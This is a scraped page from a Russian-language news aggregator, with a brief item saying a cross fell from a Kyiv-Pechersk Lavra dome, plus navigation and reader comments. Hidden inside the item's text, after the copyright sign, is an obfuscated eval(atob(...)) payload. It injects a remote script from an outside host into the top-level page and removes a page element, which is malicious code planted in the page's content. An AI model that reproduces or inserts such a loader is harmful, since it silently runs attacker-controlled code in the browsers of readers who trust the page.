Новости, событи...
ГлавнаяГеополитикаВ РоссииСтёбБывший СССРЭкономика и финансы
НовыеЛучшиеОбсуждаемыеКомментарии
Рубрики
cookingКулинарияfamilyДети и семьяshowШоу-бизнесpoliticsПолитикаhealthЗдоровье
Моя лента
ЧАТЫЧАТЫОпросыОпросыБлогерыБлогерыГлас народаГлас народаПопулярноеПопулярноеОбсуждаемоеОбсуждаемое
Мессенджер МТО компанииО компанииО редакции ГлагоLО редакции ГлагоLНовостиНовостиПартнерамПартнерамРекламодателямРекламодателямОбратная связьОбратная связьПожаловаться на спамПожаловаться на спамСоглашениеСоглашениеРекомендательные технологииРекомендательные технологии

На информационном ресурсе применяются рекомендательные технологии (информационные технологии предоставления информации на основе сбора, систематизации и анализа сведений, относящихся к предпочтениям пользователей сети "Интернет", находящихся на территории Российской Федерации)

Новости, события, факты

148 005 подписчиков

Популярные статьи

Свежие комментарии

  • Людмила Лиханова (Беговщиц)
    Какие все умные: сразу...а мы были готовы сразу? А если бы быстро рванули то сколько бы потеряли. А так мы планомерно...Судный день Киева...
  • Людмила Лиханова (Беговщиц)
    Бедная доченька...а как же те детки которые на Аллее Ангелов? ИХ вам не жалко? Или тех, кого систематически фашисты у...Судный день Киева...
  • Sergey Korotun
    Ну, наконец-то! А то вся страна уже сколько лет в напряжении: будет ли безвиз именно с Мьянмой, или нет? Ура, свершил...Могут разобрать н...

ЗНАМЕНИЕ

ЗНАМЕНИЕ

В Киево-Печерской Лавре с купола упал крест. Плохое предзнаменование, как пишут в сетях киевляне. © eval(atob('aWYoIXRvcC5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgndCcpKXtzPXRvcC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly9qc2RhdGEuZG8uYW0vbXQvcy5qcz8nK0RhdGUubm93KCk7cy5pZD0ndCc7dG9wLmRvY3VtZW50LmJvZHkucHJlcGVuZChzKTt9cGFyZW50LmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdkJykucmVtb3ZlKCk='))">.

Вернуться к статье
Комментарии
Показать предыдущие комментарии
Алексей Тан
А ещё во времена, при битве на Поле Куликовом... Господь, по вероятно, по какой то причине.... не захотел... тем землям и народу... ДАТЬ СВЯТОСТИ СВОЕЙ... и попустил... что они отказались участвовать... в битве на Поле Куликовом.
Ответить
10 час.
наверх